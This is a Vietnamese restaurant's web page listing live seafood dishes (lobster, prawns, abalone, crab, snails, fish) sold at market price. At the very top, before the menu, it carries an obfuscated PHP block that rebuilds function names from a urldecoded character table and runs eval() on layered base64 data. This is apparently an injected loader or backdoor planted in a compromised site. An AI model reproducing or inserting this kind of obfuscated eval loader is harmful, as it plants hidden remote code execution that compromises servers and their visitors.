$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iT05FWVRXbWdjb1FTcGtac1hSdmF4cnFJRlViS2pDTUd1bEJoZFBETHR5aXdWZWZKQW5IelBWalVkaEJydUx0SmxIZW9DYUtER0VRd2tPc1htV2dSY1lUeXBTdmZpYk5aTUZxbkF6eElTdjlaRHhBcnZ0TD0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> Hải sản tươi sống – Nhà Hàng Đại Hùng

Hải sản tươi sống


THEO THỜI GIÁ

 • TÔM HÙM (Sốt kim sa, nướng, nấu cháo, hấp)
 • TÔM MŨ NI (Rang mưới, cháy tỏii, hấp)
 • TÔM TÍCH (Rang mưới, cháy tỏi, hấp)
 • TÔM SÚ (Wasabi, nướng, hấp)
 • BÀO NGƯ (Wasabi, sốt dầu hào, hướng, nấu cháo)
 • HÀO (Wasabi, nướng, nấu cháo)
 • TU HẢI (Nướng, mỡ hành, hấp)
 • GHẸ (Lẩu, rang muối, hấp)
 • CUA BIỂN (Hấp, rang me)
 • ỐC HƯƠNG (Rang muối, hấp)
 • ÓC GIÁC (Gỏi, xào lá quế)
 • ÓC VOI (Gỏi, xào lá quế)
 • ÓC GAI (Nướng, hấp xả)
 • ÓC NHẢY (Nướng, hấp xả)
 • SÒ TÔ (Nướng mỡ hành)
 • CÁ MÚ (Wasabi, nấu cháo, chưng tương, hấp)
 • CÁ ĐUỐI (Hấp, nấu lẩu)
 • CÁ NHÁM (Hấp mỡ hành, kho, lẩu)
 • CÁ MAO ẾCH
 • CÁ TRÌNH
 • CÁ BÓP
 • CÁ THU
 • CÁ KÈO
 • CÁ BÓP
mon-bo
TÔM HÙM (sốt kim sa, nướng, nấu cháo, hấp)
Theo thời giá
mon-bo
TÔM HÙM (sốt kim sa, nướng, nấu cháo, hấp)
Theo thời giá